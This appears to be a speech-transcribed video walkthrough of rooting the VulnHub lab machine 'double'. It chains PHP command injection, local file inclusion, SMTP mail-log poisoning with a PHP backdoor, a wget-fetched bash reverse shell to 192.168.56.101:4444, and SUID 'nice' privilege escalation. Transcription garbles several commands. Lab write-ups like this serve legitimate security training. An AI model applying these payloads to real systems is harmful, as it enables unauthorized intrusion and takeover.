Hey, what's up everyone? Here's Matic again here with another video. Today we're going to be showcasing how to root this box double from VulnHub. I've already ran my nmap scan. I've used tag-pn to tell nmap that the host is already up and running. Tag-in to disable DNS resolution. Tag-p-tag to tell nmap to scan the whole range of ports, which is 65,535 ports, and tag T5 to speed it up. And here we are, the ports, right? So we have port 22 for OpenSSH, 25 for postfix, 80 for Apache HTTPD 2.4.38, and port 8080 for Apache 2.4.38. Here you can see the default scripts that were ran, and for example, I think we'll be on only tinkering around with the port 80 since the other ones are not that useful. For example, the 25, no, actually it will be useful for exploitation phase, but the 8080 will not. Right, so we can navigate to this website on port 80. We can see here super secure commands and production and test. If I hit Ctrl U, I can see the source code of the website, and you can see that production will redirect to the port 8080. And well, apparently, yeah, I mean, it is, but probably, I mean, I think, no, right, it's the test one. But if you click test, you will see it's password protected. And, well, you can try to brute force, obviously, but that's not the way, I think. So here you see two input fields, one for CMD, the other one for code. So first thing we want to do is just test some random strings. In this case, code looks like a password, but we can hit set command and we see this: ask to admin to update configs at production 1, and we see something like a lock. What I try to do at first would be to inject some PHP code in here, so I can open the PHP syntax like that. And we can try using, for example, system function to execute commands, and inside ID, or actually we can invoke the get request, and inside just a CMD argument. So that should work for us to test if we are able to execute commands remotely. I can just hit send command, and we see this, and it's actually working, which I did not expect, because there's another way to do that. So if I append CMD and then ID, I can see I have remote command execution. However, again, this is not the intended way. I mean, it's not that it's not the intended way, but there's another way, and actually I just discovered this one. So I can try, for example, changing something like, instead of fast out, just try something else, see if I can trigger an error, and indeed I just triggered one. So I can see here that there's an include statement being called here by PHP, and it failed opening test. So apparently this variable is just a file, and since test doesn't exist, that's why the error is triggered. So usually local file inclusion vulnerabilities happen when the include statement or the require statement is not properly synthesized. So I can try going back some directories and try to read some files. For example, we can try to read the etc pass.wd file, and you see that we can. Okay, now obviously with the remote command execution vulnerability we just found before, we would be able to just get a reverse shell and that's it. Super basic. But I found another way, which is, in my opinion, more interesting. So having into account that we have SMTP open, which is Simple Mail Transfer Protocol, well, that service is open, we can test it, right? When it's open, we sometimes have some var mail, and any user file. I mean, you can see here in the etc pass WD, we have some users with the bin sh shell. We have ppp and fox, so there might be a var mail fox, var mail ppp file existing in that route, right? Now, obviously we cannot access it. They are the only one that can access it. But what about if we just test like exploiting the SMTP, any SMTP misconfiguration, for example, SMTP off and lacks of authentication, right? So if I can connect to the SMTP service with the NC, so VM, let me use the $T as in target for my for the target IP right here. You see it defined. I can go on 25. Let's go and look at that. Now I can do something like this. hello. I know it's the server is responding back, and it says hello hostname. Now there's another which is hello, I think. Okay, I don't see any output. Obviously, you can look this up on Hactrix. And there are some statements we can use to enumerate users, for example. We can use verify, for example, PPP, it does exist, meanwhile, whatever does not, right? Obviously, these kind of messages can also leak some interesting information, such as domain from the internal network of our system. So yes, that's it. But in this case, we can actually try to send well, if it lacks authentication, we can send an email to ourselves. we can make up a false name. How would we do that? So we can set something like mail to, and I want to send a mail to www-data, which is the user Apache is running as. Meanwhile, that will be the file we can read, right? So mail from. I think we can set whatever user actually, and then in order to set set us as the recipient, we can set our RCPT to now www tag data, right? And that says okay, and I can specify data now, and I can send here my payload. So here I want to inject my PHP like backdoor in order to execute commands, obviously pretty basic, taking advantage of functions that are usually restricted by any system that is out there in the real world, for example with a web in the middle. So yes, so again, like this, get inside CMD, and let's close it like this. So I can send it, and then just a dot. That will do it. Now we can go back in here and set var mail data, and we see this. So received from unknown, even though we specified whatever, literally, just because it doesn't exist in the system, right? And we see that we can actually visualize the payload just because it's being actually executed, right? So let's try the very same thing we tried before, which is cmd equals id. And well, it's now working. So I don't know, who am I? Let me see, PHP system, get cmd. Yeah, I don't know what's going on in there. once again, ID. No, it's not being executed. Let me try again. Mail from. Let me try data. RCP2, RCPT2. Data and data. Let me try again with, for example, exec. I know why. Right, so I forgot to specify the echo command. So let me go ahead again. System, same thing, and get cmd. Let me close it, semicolon, just like that. That should do it. Dot to end it. There you go again. cmd ID. And there you go. You have the remote command execution once again. So there are two methods for this one, and we can start just exploiting the system, right? So let me check if we can execute curl or wget, and we do have wget and we don't have curl. So in order to execute wget, I would like to call a reverse shell via okay, let me open up my tmx and cmvlp 4444, and in other window I'd like to create an index.html file which will start with a shebang bin bash, and then I'm gonna be calling bin bash and a C for command line option, then bash tag I for interactive mode, set some directions, def TCP 192.168.56, and let me check what my IP is. 56.101. 0 redirection to 1. That's it. And here, let me see what's up. Okay, Python 3M HTTP server, like that. And once again, NCMVLP. And we can just try to call my wget with a dash q for quiet mode, and then 192.168.56.101 8000, which is the Python web server port, and just like that, because the index.html file will be called automatically in every HTTP server, right? So from here, in order to have wget running, not downloading the actual content but just showing it up on the output, we can just specify a tag, capital O, and a tag, right? Now let me just copy that, because anything may go wrong, but it does not apparently. So we have the contents in here and we can see it. So if we just pipe these contents to bash, we should get a reverse shell. It's not, and these might be like that because of the because of this. Let me just open up my burp suite to see if it works this way. It often happens, right? So let me just click on next, start burp, starting project. Please wait. I'm gonna be, actually I don't have a burp suite created because I had a problem with my Kali Linux, so I need to create one again. So let me just add it. In case you haven't done this like me, just be sure to download Foxy Proxy from the add-ons Mozilla page. So we have burp suite. Okay, and 127.0.0.1, which is the loopback address. And the port, you can find it in here in proxying options, and look at that, it's listening on 8080, right? So that should do it. Let me just enable it here now. Burp suite, go back here, so I can go to proxy intercept is on. Let me send it there. We should grab it, and here's the request. So we can just hit Ctrl R to send it over to the repeater and then send. And it's not, so let me remove this just to see if it's working like this. Yes, it is. And let me try it here, bash. I mean, it's getting it. Cut index. Right. I have a problem here in my syntax. It is that I'm not specifying the port I want the reverse shell to be sent to. Right, so I just added a 4444 as import, and I can fire up my Python web server once again. And if I send it now, there you go. We have a reverse shell, so we can start normalizing it or stabilizing it with script def null, and then cbash, then Ctrl Z to suspend it, and we can execute SSTY, was TTY, yeah, STTY raw minus echo, then for round, then reset xterm, and then we can export the term environmental variable as in xterm. That will allow us effectively to hit Ctrl L and Ctrl C to cancel processes and clean our window. From here, it's just pretty much, well, look at that. We have the out command, which is the logs that appear in there. And if we see the send command, we will see that we are using the include statement right here to out. There is no any kind of input sanitization, so that's why the LFI vulnerability is possible, right? So we can go back, I mean, checking it and see the permissions of these ones, because this weird directory is from Fox and production, and that's fine. So let me now look for SCUID, so perm US exec LSL, like this, to dev no. Okay, we see gpass LED mount, fuser mount, and I have a nice. That is interesting because when I did the machine at first, I haven't ever like seen it before, so I decided to look it up on GTF Opens, and I discovered there was actually a way to escape out of it with a technique. If you go to GTF Opens, you can start searching for nice, and there you go, we have it. And if we can execute it as sudo, as a SUID, actually we just need to execute this one. And actually we can just execute this, because you can run, well, let me switch over back to my other network adapter. You can just execute nice and then bin sh and tag p id, and there you go. You have an effective UID as root, so you can effectively add the root flag, right? And there you go, you have rooted the machine effectively. And that's a wrap. That's everything for today, guys. I hope you guys liked it, and I'll see you later in another video. All right, bye bye.